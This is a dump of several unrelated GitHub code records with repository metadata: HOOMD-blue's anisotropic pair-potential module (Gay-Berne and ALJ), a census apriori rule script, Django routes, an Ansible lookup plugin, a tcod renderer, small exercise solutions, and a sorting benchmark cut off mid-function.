:math:`[\\mathrm{length}]`.\n mode (str): energy shifting/smoothing mode.\n\n `GayBerne` computes the Gay-Berne anisotropic pair force on every particle\n in the simulation state. This version of the Gay-Berne force supports\n identical pairs of uniaxial ellipsoids, with orientation-independent\n energy-well depth. The potential comes from the following paper `Allen et.\n al. 2006`_.\n\n .. _Allen et. al. 2006: http://dx.doi.org/10.1080/00268970601075238\n\n .. math::\n U(\\vec r, \\vec e_i, \\vec e_j) =\n \\begin{cases}\n 4 \\varepsilon \\left[ \\zeta^{-12} - \\zeta^{-6} \\right]\n & \\zeta < \\zeta_{\\mathrm{cut}} \\\\\n 0 & \\zeta \\ge \\zeta_{\\mathrm{cut}} \\\\\n \\end{cases}\n\n where\n\n .. math::\n\n \\zeta &= \\left(\\frac{r-\\sigma+\\sigma_{\\mathrm{min}}}\n {\\sigma_{\\mathrm{min}}}\\right),\n\n \\sigma^{-2} &= \\frac{1}{2} \\hat{\\vec{r}}\n \\cdot \\vec{H^{-1}} \\cdot \\hat{\\vec{r}},\n\n \\vec{H} &= 2 \\ell_\\perp^2 \\vec{1}\n + (\\ell_\\parallel^2 - \\ell_\\perp^2)\n (\\vec{e_i} \\otimes \\vec{e_i} + \\vec{e_j} \\otimes \\vec{e_j}),\n\n and :math:`\\sigma_{\\mathrm{min}} = 2 \\min(\\ell_\\perp, \\ell_\\parallel)`.\n\n The cut-off parameter :math:`r_{\\mathrm{cut}}` is defined for two particles\n oriented parallel along the **long** axis, i.e.\n :math:`\\zeta_{\\mathrm{cut}} = \\left(\\frac{r-\\sigma_{\\mathrm{max}}\n + \\sigma_{\\mathrm{min}}}{\\sigma_{\\mathrm{min}}}\\right)`\n where :math:`\\sigma_{\\mathrm{max}} = 2 \\max(\\ell_\\perp, \\ell_\\parallel)` .\n\n The quantities :math:`\\ell_\\parallel` and :math:`\\ell_\\perp` denote the\n semi-axis lengths parallel and perpendicular to particle orientation.\n\n Example::\n\n nl = nlist.Cell()\n gay_berne = md.pair.aniso.GayBerne(nlist=nl, default_r_cut=2.5)\n gay_berne.params[('A', 'A')] = dict(epsilon=1.0, lperp=0.45, lpar=0.5)\n gay_berne.r_cut[('A', 'B')] = 2 ** (1.0 / 6.0)\n\n .. py:attribute:: params\n\n The Gay-Berne potential parameters. The dictionary has the following\n keys:\n\n * ``epsilon`` (`float`, **required**) - :math:`\\varepsilon`\n :math:`[\\mathrm{energy}]`\n * ``lperp`` (`float`, **required**) - :math:`\\ell_\\perp`\n :math:`[\\mathrm{length}]`\n * ``lpar`` (`float`, **required**) - :math:`\\ell_\\parallel`\n :math:`[\\mathrm{length}]`\n\n Type: `TypeParameter` [`tuple` [``particle_type``, ``particle_type``],\n `dict`]\n \"\"\"\n _cpp_class_name = \"AnisoPotentialPairGB\"\n\n def __init__(self, nlist, default_r_cut=None, mode='none'):\n super().__init__(nlist, default_r_cut, mode)\n params = TypeParameter(\n 'params', 'particle_types',\n TypeParameterDict(epsilon=float,\n lperp=float,\n lpar=float,\n len_keys=2))\n self._add_typeparam(params)\n\n @log(category=\"object\")\n def type_shapes(self):\n \"\"\"Get all the types of shapes in the current simulation.\n\n Example:\n\n >>> gay_berne.type_shapes\n [{'type': 'Ellipsoid', 'a': 1.0, 'b': 1.0, 'c': 1.5}]\n\n Returns:\n A list of dictionaries, one for each particle type in the system.\n \"\"\"\n return super()._return_type_shapes()\n\n\nclass ALJ(AnisotropicPair):\n r\"\"\"Anistropic LJ force.\n\n Args:\n nlist (hoomd.md.nlist.NeighborList): Neighbor list\n default_r_cut (float): Default cutoff radius :math:`[length]`.\n\n `ALJ` computes the Lennard-Jones force between anisotropic particles as\n described in `Ramasubramani, V. et al. 2020`_, using the formula:\n\n .. _Ramasubramani, V. et al. 2020: https://doi.org/10.1063/5.0019735\n\n .. math::\n\n U(r, r_c) = U_0(r) + U_c(r_c)\n\n The first term is the central interaction :math:`U_0`, the standard\n center-center interaction between two Lennard-Jones particles with\n center-center distance :math:`r`. The second term is the contact interaction\n :math:`U_c`, computed from the smallest distance between the surfaces of the\n two shapes :math:`r_c`. The central and contact interactions are defined as\n follows:\n\n .. math::\n\n &U_0(r) = 4 \\varepsilon \\left[ \\left( \\frac{\\sigma}{r} \\right)^{12} -\n \\left( \\frac{\\sigma}{r} \\right)^{6} \\right]\n\n &U_c(r_c) = 4 \\varepsilon_c(\\varepsilon) \\left[ \\left(\n \\frac{\\sigma_c}{r_c} \\right)^{12} - \\left( \\frac{\\sigma_c}{r_c}\n \\right)^{6} \\right]\n\n where :math:`\\varepsilon` (`epsilon `) affects strength of both the\n central and contact interactions, :math:`\\varepsilon_c` is an energy\n coefficient set proportional to :math:`\\varepsilon` to preserve the shape,\n :math:`\\sigma` is the interaction distance of the central term computed as\n the average of :math:`\\sigma_i` (`sigma_i `) and :math:`\\sigma_j`\n (`sigma_j `). Lastly, `ALJ` uses the contact ratios :math:`\\beta_i`\n (`contact_ratio_i `) and :math:`\\beta_j` (`contact_ratio_j\n `) to compute the contact sigma :math:`\\sigma_c` as follows:\n\n .. math::\n\n \\sigma_c &= \\frac{1}{2} \\left[\\sigma_{ci} + \\sigma_{cj} \\right]\n\n \\sigma_{ci} &= \\beta_i \\cdot \\sigma_i\n\n \\sigma_{cj} &= \\beta_j \\cdot \\sigma_j\n\n The total potential energy is therefore the sum of two interactions, a\n central Lennard-Jones potential and a radially-shifted Lennard-Jones\n potential where the shift is anisotropic and depends on the extent of the\n shape in each direction.\n\n Each term has an independent cutoff at which the energy is set to zero.\n The behavior of these cutoffs is dependent on whether a user requires LJ\n or Weeks-Chandler-Anderson (WCA)-like (repulsive-only) behavior. This\n behavior is controlled using the `alpha ` parameter, which can\n take on the following values:\n\n .. list-table:: Set alpha based on range of the center-center and\n contact-contact interactions.\n :header-rows: 1\n :stub-columns: 1\n\n * -\n - center-center repulsive only\n - center-center full-range\n * - contact-contact repulsive only\n - alpha = 0\n - alpha = 1\n * - contact-contact full-range\n - alpha = 2\n - alpha = 3\n\n For polytopes, computing interactions using a single contact point leads to\n significant instabilities in the torques because the contact point can jump\n from one end of a face to another in an arbitrarily small time interval. To\n ameliorate this, the ALJ potential performs a local averaging over all the\n features associated with the closest simplices on two polytopes. This\n averaging can be turned off by setting the ``average_simplices`` key for the\n type pair to ``False``.\n\n Specifying only ``rounding_radii`` creates an ellipsoid, while specifying\n only ``vertices`` creates a convex polytope (set ``vertices`` and ``faces``\n to empty lists to create the ellipsoid).\n\n Important:\n The repulsive part of the contact interaction :math:`U_c(r_c)` prevents\n two `ALJ` particles from approaching closely, effectively rounding the\n shape by a radius :math:`\\sigma_c`. For this reason, the shape written\n by `type_shapes` includes the rounding due to `rounding_radii `\n and that due to :math:`\\sigma_c`.\n\n .. rubric:: Choosing `r_cut `:\n\n Set `r_cut ` for each pair of particle types so\n that `ALJ` can compute interactions for all possible relative placements\n and orientations of the particles. The farthest apart two particles can be\n while still interacting depends on the value of ``alpha``.\n\n In the following list, the first argument to the :math:`\\max` function is\n for the center-center interaction. The second argument is for the\n contact-contact interaction, where :math:`R_i` is the radius of the\n shape's minimal origin-centered bounding sphere of the particle with type\n :math:`i`.\n\n Let :math:`\\lambda_{min} = 2^{1/6}` be the position of the potential energy\n minimum of the Lennard-Jones potential and\n :math:`\\lambda_{cut}^{attractive}` be a larger value, such as 2.5 (typically\n used in isotropic LJ systems).\n\n * For alpha=0:\n\n .. math::\n\n r_{\\mathrm{cut},ij} = \\max \\bigg( & \\frac{\\lambda_{min}}{2}\n (\\sigma_i + \\sigma_j), \\\\\n & R_i + R_j + R_{\\mathrm{rounding},i} +\n R_{\\mathrm{rounding},j} + \\frac{\\lambda_{min}}{2}\n (\\beta_i \\cdot \\sigma_i + \\beta_j \\cdot \\sigma_j) \\bigg)\n\n * For alpha=1:\n\n .. math::\n\n r_{\\mathrm{cut},ij} =\n \\max \\bigg( & \\frac{\\lambda_{cut}^{attractive}}{2}\n (\\sigma_i + \\sigma_j), \\\\\n & R_i + R_j + R_{\\mathrm{rounding},i} +\n R_{\\mathrm{rounding},j}+ \\frac{\\lambda_{min}}{2}\n (\\beta_i \\cdot \\sigma_i + \\beta_j \\cdot \\sigma_j) \\bigg)\n\n * For alpha=2:\n\n .. math::\n\n r_{\\mathrm{cut},ij} = \\max \\bigg( & \\frac{\\lambda_{min}}{2}\n (\\sigma_i + \\sigma_j)), \\\\\n & R_i + R_j + R_{\\mathrm{rounding},i} +\n R_{\\mathrm{rounding},j} + \\frac{\\lambda_{cut}^{attractive}}{2}\n (\\beta_i \\cdot \\sigma_i + \\beta_j \\cdot \\sigma_j) \\bigg)\n\n * For alpha=3:\n\n .. math::\n\n r_{\\mathrm{cut},ij} =\n \\max \\bigg( & \\frac{\\lambda_{cut}^{attractive}}{2}\n (\\sigma_i + \\sigma_j), \\\\\n & R_i + R_j + R_{\\mathrm{rounding},i} +\n R_{\\mathrm{rounding},j} + \\frac{\\lambda_{cut}^{attractive}}{2}\n (\\beta_i \\cdot \\sigma_i + \\beta_j \\cdot \\sigma_j) \\bigg)\n\n Warning:\n Changing dimension in a simulation will invalidate this force and will\n lead to error or unrealistic behavior.\n\n .. py:attribute:: params\n\n The ALJ potential parameters. The dictionary has the following keys:\n\n * ``epsilon`` (`float`, **required**) - base energy scale\n :math:`\\varepsilon` :math:`[energy]`.\n * ``sigma_i`` (`float`, **required**) - the insphere diameter of the\n first particle type, :math:`\\sigma_i` :math:`[length]`.\n * ``sigma_j`` (`float`, **required**) - the insphere diameter of the\n second particle type, :math:`\\sigma_j` :math:`[length]`.\n * ``alpha`` (`int`, **required**) - Integer 0-3 indicating whether or\n not to include the attractive component of the interaction (see\n above for details).\n * ``contact_ratio_i`` (`float`, **optional**) - :math:`\\beta_i`, the\n ratio of the contact sphere diameter of the first type with\n ``sigma_i``.\n Defaults to 0.15.\n * ``contact_ratio_j`` (`float`, **optional**) - :math:`\\beta_j`, the\n ratio of the contact sphere diameter of the second type with\n ``sigma_j``.\n Defaults to 0.15.\n * ``average_simplices`` (`bool`, **optional**) - Whether to average over\n simplices. Defaults to ``True``. See class documentation for more\n information.\n\n Type: `hoomd.data.typeparam.TypeParameter` [`tuple` [``particle_types``,\n ``particle_types``], `dict`]\n\n Note:\n While the evaluation of the potential is symmetric with respect to\n the potential parameter labels ``i`` and ``j``, the parameters which\n physically represent a specific particle type must appear in all sets\n of pair parameters which include that particle type.\n\n .. py:attribute:: shape\n\n The shape of a given type. The dictionary has the following keys per\n type:\n\n * ``vertices`` (`list` [`tuple` [`float`, `float`, `float`]],\n **required**) - The vertices of a convex polytope in 2 or 3\n dimensions. The third dimension in 2D is ignored.\n * ``rounding_radii`` (`tuple` [`float`, `float`, `float`] or `float`,\n **required**) - The semimajor axes of a rounding ellipsoid\n :math:`R_{\\mathrm{rounding},i}`. If a single value is specified, the\n rounding ellipsoid is a sphere. Defaults to (0.0, 0.0, 0.0).\n * ``faces`` (`list` [`list` [`int`]], **required**) - The faces of the\n polyhedron specified as a list of list of integers. The indices\n corresponding to the vertices must be ordered counterclockwise with\n respect to the face normal vector pointing outward from the origin.\n\n Type: `hoomd.data.typeparam.TypeParameter` [``particle_types``, `dict`]\n\n Example::\n\n nl = hoomd.md.nlist.Cell(buffer=0.4)\n alj = hoomd.md.pair.aniso.ALJ(nl, r_cut=2.5)\n\n cube_verts = [(-0.5, -0.5, -0.5),\n (-0.5, -0.5, 0.5),\n (-0.5, 0.5, -0.5),\n (-0.5, 0.5, 0.5),\n (0.5, -0.5, -0.5),\n (0.5, -0.5, 0.5),\n (0.5, 0.5, -0.5),\n (0.5, 0.5, 0.5)];\n\n cube_faces = [[0, 2, 6],\n [6, 4, 0],\n [5, 0, 4],\n [5,1,0],\n [5,4,6],\n [5,6,7],\n [3,2,0],\n [3,0,1],\n [3,6,2],\n [3,7,6],\n [3,1,5],\n [3,5,7]]\n\n alj.params[(\"A\", \"A\")] = dict(epsilon=2.0,\n sigma_i=1.0,\n sigma_j=1.0,\n alpha=1,\n )\n alj.shape[\"A\"] = dict(vertices=cube_verts,\n faces=cube_faces)\n\n The following example shows how to easily get the faces, with vertex indices\n properly ordered, for a shape with known vertices by using the\n `coxeter `_ package:\n\n Example::\n\n import coxeter\n\n nl = hoomd.md.nlist.Cell(buffer=0.4)\n alj = hoomd.md.pair.aniso.ALJ(nl, r_cut=2.5)\n\n cube_verts = [[-0.5, -0.5, -0.5],\n [-0.5, -0.5, 0.5],\n [-0.5, 0.5, -0.5],\n [-0.5, 0.5, 0.5],\n [0.5, -0.5, -0.5],\n [0.5, -0.5, 0.5],\n [0.5, 0.5, -0.5],\n [0.5, 0.5, 0.5]]\n\n cube = coxeter.shapes.ConvexPolyhedron(cube_verts)\n\n alj.params[(\"A\", \"A\")] = dict(epsilon=2.0,\n sigma_i=1.0,\n sigma_j=1.0,\n alpha=1,\n )\n alj.shape[\"A\"] = dict(vertices=cube.vertices,\n faces=cube.faces)\n\n \"\"\"\n\n # We don't define a _cpp_class_name since the dimension is a template\n # parameter in C++, so use an instance level attribute instead that is\n # created in _attach based on the dimension of the associated simulation.\n\n def __init__(self, nlist, default_r_cut=None):\n super().__init__(nlist, default_r_cut, 'none')\n params = TypeParameter(\n 'params', 'particle_types',\n TypeParameterDict(epsilon=float,\n sigma_i=float,\n sigma_j=float,\n alpha=int,\n contact_ratio_i=0.15,\n contact_ratio_j=0.15,\n average_simplices=True,\n len_keys=2))\n\n shape = TypeParameter(\n 'shape', 'particle_types',\n TypeParameterDict(vertices=[(float, float, float)],\n faces=[[int]],\n rounding_radii=OnlyIf(\n to_type_converter((float, float, float)),\n preprocess=self._to_three_tuple),\n len_keys=1,\n _defaults={'rounding_radii', (0.0, 0.0, 0.0)}))\n\n self._extend_typeparam((params, shape))\n\n def _attach_hook(self):\n self._cpp_class_name = \"AnisoPotentialPairALJ{}\".format(\n \"2D\" if self._simulation.state.box.is2D else \"3D\")\n\n super()._attach_hook()\n\n @staticmethod\n def _to_three_tuple(value):\n if isinstance(value, Sequence):\n return value\n if isinstance(value, Number):\n return (value, value, value)\n else:\n raise ValueError(f\"Expected a float or tuple object got {value}\")\n\n @log(category=\"object\", requires_run=True)\n def type_shapes(self):\n \"\"\"`list` [`dict` [`str`, ``any``]]: The shape specification for use \\\n with GSD files for visualization.\n\n This is not meant to be used for access to shape information in Python.\n See the attribute ``shape`` for programatic assess. Use this property to\n log shape for visualization and storage through the GSD file type.\n \"\"\"\n return self._return_type_shapes()\n","repo_name":"glotzerlab/hoomd-blue","sub_path":"hoomd/md/pair/aniso.py","file_name":"aniso.py","file_ext":"py","file_size_in_byte":21802,"program_lang":"python","lang":"en","doc_type":"code","stars":291,"dataset":"github-code","pt":"5"} +{"seq_id":"19899233167","text":"import random \nlist_a = [[],[]]\nmatrix= []\n\nfor i in range(2): \n\tlist_a[i] = random.sample(range(0,9),8)\n\nfor i in range(len(list_a[0])):\n\tval = [list_a[0][i]+s for s in list_a[1]]\n\tmatrix.append(val)\n#print(len(matrix))\n#print(['%s \\r\\n' % matrix[i][:] for i in range(5)]) \n\ndef path_find(G,start_v): # G is a matrix, start_v = (row ,col) : list\n\tcurrent_node = start_v \n\tvisited_que = G[start_v[0]][start_v[1]]\n\tn = len(G)\n\tunvisited_node = [[None]*n]*n\n\t\n\t\n\t\n\treturn distance \n\nprint(path_find(matrix,))\n","repo_name":"verpassen/python-test","sub_path":"練習/path finding/maze.py","file_name":"maze.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"7221908773","text":"import csv\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as mlt\r\nfrom apyori import apriori\r\n\r\n\r\ndef read_data(filename):\r\n with open(filename, 'r') as f:\r\n reader = csv.DictReader(f, delimiter=',')\r\n headers = reader.fieldnames\r\n census = []\r\n census_dict = {}\r\n for header in headers:\r\n census_dict[header] = None\r\n print(headers)\r\n for line in reader:\r\n for header in headers:\r\n if line[header] != '0':\r\n census_dict[header] = line[header]\r\n else:\r\n census_dict[header] = 'None'\r\n census.append(census_dict)\r\n census_dict = {}\r\n return census\r\n\r\n\r\ndef toString(dic):\r\n dic_str = ''\r\n for key in dic.keys():\r\n dic_str += (key + '=' + dic[key] + ',')\r\n dic_str = dic_str[:-1]\r\n return dic_str\r\n\r\n\r\ndef arrangingRules(rules):\r\n x_list, xy_list = [], []\r\n for rule in rules:\r\n x = rule.split('}=>{')[0][1:].split(',')\r\n y = rule.split('}=>{')[1][:-1].split(',')\r\n x_list.append(x)\r\n xy_list.append(x + y)\r\n print(x_list, xy_list)\r\n census_data = pd.read_csv('census.csv', header=None)\r\n num_records = len(census_data)\r\n print(num_records)\r\n records = []\r\n for i in range(0, num_records):\r\n records.append([str(census_data.values[i, j]) for j in range(0, 12)])\r\n print(records)\r\n association_rules = apriori(records, min_support=0.3, min_confidence=0.2, min_lift=1, min_length=3, max_length=3)\r\n association_results = list(association_rules)\r\n print(len(association_results))\r\n results = []\r\n for item in association_results:\r\n print(item)\r\n for item in association_results:\r\n pair = item[0]\r\n items = [x for x in pair]\r\n value0 = \",\".join(items)\r\n value2 = str(item[1]) # to convert into object\r\n rows = (value0, value2)\r\n results.append(rows)\r\n labels = ['Attribute', 'Support']\r\n census = pd.DataFrame.from_records(results, columns=labels)\r\n x_support, xy_support = [], []\r\n for j in range(len(x_list)):\r\n for i in range(len(census)):\r\n element = census['Attribute'][i]\r\n if len(element) == sum([len(item) for item in x_list[j]]) + len(x_list[j]) - 1:\r\n match = True\r\n for rule in x_list[j]:\r\n if rule not in element:\r\n match = False\r\n if match:\r\n x_support.append(census['Support'][i])\r\n if len(element) == sum([len(item) for item in xy_list[j]]) + len(xy_list[j]) - 1:\r\n match = True\r\n for rule in xy_list[j]:\r\n if rule not in element:\r\n match = False\r\n if match:\r\n xy_support.append(census['Support'][i])\r\n print(x_support, xy_support)\r\n confidences = [float(xy) / float(x) for x, xy in zip(x_support, xy_support)]\r\n print(confidences)\r\n result = list(zip(rules, confidences))\r\n print(result)\r\n result = sorted(result, key=lambda x: x[1], reverse=True)\r\n for rule, confid in result:\r\n print(rule)\r\n\r\n\r\ndef arrangingRules2(rules):\r\n x_list, xy_list = [], []\r\n for rule in rules:\r\n x = rule.split('}=>{')[0][1:].split(',')\r\n y = rule.split('}=>{')[1][:-1].split(',')\r\n x_list.append(x)\r\n xy_list.append(x + y)\r\n census_data = pd.read_csv('census.csv', header=None)\r\n num_records = len(census_data)\r\n records = []\r\n for i in range(0, num_records):\r\n records.append([str(census_data.values[i, j]) for j in range(0, 12)])\r\n x_support, xy_support = [], []\r\n for j in range(len(x_list)):\r\n x_count = 0\r\n xy_count = 0\r\n for i in range(len(records)):\r\n match = True\r\n for rule in x_list[j]:\r\n if rule not in records[i]:\r\n match = False\r\n if match:\r\n x_count += 1\r\n match = True\r\n for rule in xy_list[j]:\r\n if rule not in records[i]:\r\n match = False\r\n if match:\r\n xy_count += 1\r\n x_support.append(x_count / 30162)\r\n xy_support.append(xy_count / 30162)\r\n confidences = [float(xy) / float(x) for x, xy in zip(x_support, xy_support)]\r\n result = list(zip(rules, confidences))\r\n result = sorted(result, key=lambda x: x[1], reverse=True)\r\n rules = []\r\n for rule, confid in result:\r\n rules.append(rule)\r\n return rules\r\n\r\n\r\nif __name__ == '__main__':\r\n rules = ['{native-country=United-States,capital-gain=None}=>{capital-loss=None}',\r\n '{capital-gain=None,capital-loss=None}=>{native-country=United-States}',\r\n '{native-country=United-States,capital-loss=None}=>{capital-gain=None}']\r\n arrangingRules(rules)\r\n","repo_name":"xinkaichen97/HackerRank","sub_path":"Data Science/census.py","file_name":"census.py","file_ext":"py","file_size_in_byte":4938,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"311933612","text":"from django.contrib import admin\nfrom django.urls import path,re_path\nfrom . import views\napp_name=\"article\"\n\nurlpatterns=[\n path(\"dashboard/\",views.dashboard,name=\"dashboard\"),\n path(\"createarticle/\",views.createarticle,name=\"createarticle\"),\n path(\"article/\",views.article.as_view(),name=\"article\"),\n path(\"update/\",views.update.as_view(),name=\"update\"),\n path(\"delete/\",views.deleteArticle,name=\"delete\"),\n path(\"\",views.articles,name=\"articles\"),\n re_path(r'^update/(?P\\d+)/$', views.update.as_view())\n \n]\n\n","repo_name":"Keremm1/django_blog","sub_path":"article/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"3338565498","text":"from __future__ import (absolute_import, division, print_function)\n__metaclass__ = type\n\ntry:\n # Python 2\n from itertools import izip\nexcept ImportError:\n # Python 3\n izip = zip\n\nfrom itertools import cycle\n\nimport ansible.errors as errors\ntry:\n from __main__ import display\nexcept ImportError:\n from ansible.utils.display import Display\n display = Display()\n\ntry:\n # ansible 2.0 - 2.3\n from ansible.plugins.lookup import LookupBase\n from ansible.utils.listify import listify_lookup_plugin_terms\n from jinja2.exceptions import UndefinedError\n\n class LookupModule(LookupBase):\n \"\"\"\n Zip two arrays, thereby cycling through the second array:\n [1, 2, 3], [4, 5] -> [1, 4], [2, 5], [3, 4]\n \"\"\"\n def _lookup_variables(self, terms):\n results = []\n for x in terms:\n try:\n intermediate = listify_lookup_plugin_terms(x, templar=self._templar, loader=self._loader)\n except UndefinedError as e:\n raise errors.AnsibleUndefinedVariable(\n \"One of the nested variables was undefined. The error was: %s\" % e)\n results.append(intermediate)\n return results\n\n def run(self, terms, variables, **kwargs):\n terms = self._lookup_variables(terms)\n my_list = terms[:]\n if len(my_list) != 2:\n raise errors.AnsibleError(\"with_zip_cycle requires exactly two lists\")\n return [self._flatten(x) for x in izip(my_list[0], cycle(my_list[1]))]\n\nexcept ImportError:\n # ansible-1.9.x\n from ansible.utils import listify_lookup_plugin_terms\n\n def flatten(terms):\n ret = []\n for term in terms:\n if isinstance(term, list):\n ret.extend(term)\n elif isinstance(term, tuple):\n ret.extend(term)\n else:\n ret.append(term)\n return ret\n\n class LookupModule(object):\n \"\"\"\n Zip two arrays, thereby cycling through the second array:\n [1, 2, 3], [4, 5] -> [1, 4], [2, 5], [3, 4]\n \"\"\"\n def __init__(self, basedir=None, **kwargs):\n self.basedir = basedir\n\n def __lookup_injects(self, terms, inject):\n results = []\n for x in terms:\n intermediate = listify_lookup_plugin_terms(x, self.basedir, inject)\n results.append(intermediate)\n return results\n\n def run(self, terms, inject=None, **kwargs):\n terms = listify_lookup_plugin_terms(terms, self.basedir, inject)\n terms = self.__lookup_injects(terms, inject)\n my_list = terms[:]\n if len(my_list) != 2:\n raise errors.AnsibleError(\"with_zip_cycle requires exactly two lists\")\n res = [flatten(x) for x in izip(my_list[0], cycle(my_list[1]))]\n print(\"res: {}\".format(res))\n return res\n","repo_name":"wireapp/ansible-cassandra","sub_path":"lookup_plugins/zip_cycle.py","file_name":"zip_cycle.py","file_ext":"py","file_size_in_byte":2974,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"5"} +{"seq_id":"12820694542","text":"class Solution:\n def rangeSum(self, nums: List[int], n: int, left: int, right: int) -> int:\n ans = []\n length = len(nums)\n \n for i in range(length):\n val = nums[i]\n ans.append(val)\n for j in range(i+1, length):\n val += nums[j]\n ans.append(val)\n \n ans.sort()\n return sum(ans[left-1:right]) % (10**9 + 7)\n \n ","repo_name":"Maunil/Leetcode_Solutions","sub_path":"1508. Range Sum of Sorted Subarray Sums.py","file_name":"1508. Range Sum of Sorted Subarray Sums.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"5"} +{"seq_id":"72519283673","text":"# Задание № Алгоритм\n# 1. Даны два значения ( numbers , desired_sum )\n# 2. Первая это список из чисел\n# 3. Вторая это число которое должно получиться из двух чисел\n# Смысл :\n# Нужно сделать так чтобы возвращался индекс двух чисел которые в сумме возвращают желаемую сумму\n# Например есть список из таких чисел [2, 7, 11, 15] желаемая сумма является число 9 , значит должен\n# возвращаться индекс [0, 1] потому что только сумма этих двух чисел является желаемой\n# Подсказка : Нужно использовать циклы for\n# ДОП домашка :\n# Сделать в классахdd\n \nnum = 9\nlist_num = [2, 7, 3, 7, 2, 2]\n\nclass R:\n def __init__(self, lst) -> None:\n self.lst = lst\n def find_i(self, num):\n result = []\n for i in range(len(self.lst)):\n for k in range(i, len(self.lst)):\n if self.lst[i] + self.lst[k] == num:\n result_i = (i, k)\n result.append(result_i)\n \n return result\n\n \n \nara = R(list_num)\nprint(ara.find_i(num))\n\n","repo_name":"Argen1854/Argen_homework","sub_path":"Argen_homework_6.1.py","file_name":"Argen_homework_6.1.py","file_ext":"py","file_size_in_byte":1382,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"21013767416","text":"a, b = map(str, input().split())\r\namax = bmax = amin = bmin = ''\r\nfor i in a:\r\n if i == \"5\" or i == '6':\r\n amax += '6'\r\n amin += '5'\r\n else:\r\n amax += i\r\n amin += i\r\nfor i in b:\r\n if i == \"5\" or i == '6':\r\n bmax += '6'\r\n bmin += '5'\r\n else:\r\n bmax += i\r\n bmin += i\r\nprint(int(amin) + int(bmin), int(amax) + int(bmax))","repo_name":"ndhung1st/200baicodethieunhi","sub_path":"chu_de_toan_hoc/bai59.py","file_name":"bai59.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"27953609647","text":"import tcod as libtcod\n\nfrom components.question import Question\n\ndef render_all(con, panel, entities, player, game_map, fov_map, fov_recompute, message_log, screen_width, screen_height, bar_width, panel_height, panel_y, colors):\n if fov_recompute:\n for y in range(game_map.height):\n for x in range(game_map.width):\n visible = libtcod.map_is_in_fov(fov_map, x, y)\n wall = game_map.tiles[x][y].block_sight\n\n if visible:\n if wall:\n libtcod.console_set_char_background(con, x, y, colors.get('light_wall'), libtcod.BKGND_SET)\n else:\n libtcod.console_set_char_background(con, x, y, colors.get('light_ground'), libtcod.BKGND_SET)\n game_map.tiles[x][y].explored = True\n elif game_map.tiles[x][y].explored:\n if wall:\n libtcod.console_set_char_background(con, x, y, colors.get('dark_wall'), libtcod.BKGND_SET)\n else:\n libtcod.console_set_char_background(con, x, y, colors.get('dark_ground'), libtcod.BKGND_SET)\n\n # Draw all entities in the list\n for entity in entities:\n if entity is Question:\n if entity.question.answered:\n continue\n\n draw_entity(con, entity, fov_map)\n\n libtcod.console_blit(con, 0, 0, screen_width, screen_height, 0, 0, 0)\n libtcod.console_set_default_background(panel, libtcod.black)\n libtcod.console_clear(panel)\n\n # Print the game messages, one line at a time\n y = 1\n for message in message_log.messages:\n libtcod.console_set_default_foreground(panel, message.color)\n libtcod.console_print_ex(panel, message_log.x, y, libtcod.BKGND_NONE, libtcod.LEFT, message.text)\n y += 1\n\n render_bar(panel, 1, 1, bar_width, '',\n libtcod.light_red, libtcod.darker_red\n )\n\n libtcod.console_blit(panel, 0, 0, screen_width, panel_height, 0, 0, panel_y)\n\n\ndef clear_all(con, entities):\n for entity in entities:\n clear_entity(con, entity)\n\n\ndef draw_entity(con, entity, fov_map):\n if libtcod.map_is_in_fov(fov_map, entity.x, entity.y):\n libtcod.console_set_default_foreground(con, entity.color)\n libtcod.console_put_char(con, entity.x, entity.y, entity.char, libtcod.BKGND_NONE)\n\n\ndef clear_entity(con, entity):\n # erase the character that represents this object\n libtcod.console_put_char(con, entity.x, entity.y, ' ', libtcod.BKGND_NONE)\n\ndef render_bar(panel, x, y, total_width, text, bar_color, back_color):\n libtcod.console_set_default_background(panel, back_color)\n libtcod.console_rect(panel, x, y, total_width, 1, False, libtcod.BKGND_SCREEN)\n\n libtcod.console_set_default_background(panel, bar_color)\n\n libtcod.console_set_default_foreground(panel, libtcod.white)\n libtcod.console_print_ex(panel, int(x + total_width / 2), y, libtcod.BKGND_NONE, libtcod.CENTER, text)","repo_name":"tetrica/rv-game","sub_path":"src/render_functions.py","file_name":"render_functions.py","file_ext":"py","file_size_in_byte":2986,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"5228293284","text":"# -*- coding:utf-8 -*-\r\nimport sys\r\nsys.setrecursionlimit(1000000)\r\n\r\nimport random\r\nimport time\r\nfrom matplotlib import pyplot as plt\r\n\r\n\r\n# 获取随机数据\r\ndef GetRandomData(size=10, min=0, max=100):\r\n ar = []\r\n for i in range(size):\r\n ar.append(random.randint(min, max))\r\n return ar\r\n\r\n\r\n# 测试, 返回测试规模和对应消耗的时间\r\ndef TestSort(test_func, min_size, max_size, step):\r\n size_list = []\r\n time_list = []\r\n for i in range(min_size, max_size, step):\r\n ar = GetRandomData(i)\r\n\r\n start = time.time()\r\n test_func(ar)\r\n end = time.time()\r\n use_time = (end - start) * 1000\r\n\r\n size_list.append(i)\r\n time_list.append(use_time)\r\n return size_list, time_list\r\n\r\n\r\n# 可视化测试函数返回的数据\r\ndef PlotTestData(test_func, size_list, time_list, *args):\r\n print('all time: {}'.format(sum(time_list)))\r\n plt.subplot(*args)\r\n plt.xlabel('size')\r\n plt.ylabel('time(ms)')\r\n plt.title(getattr(test_func, '__name__'))\r\n plt.plot(size_list, time_list)\r\n\r\n\r\n# 插入排序\r\ndef InsertionSort(ar):\r\n for j in range(1, len(ar)): # j从数组的第2个开始\r\n for i in range(0, j): # i从数组的第1个开始, 但不能超过j\r\n if ar[j] < ar[i]: # 如果 ar[j] < ar[i]\r\n temp = ar[i:j]\r\n ar[i] = ar[j] # 将 ar[j] 插入到 ar[i] 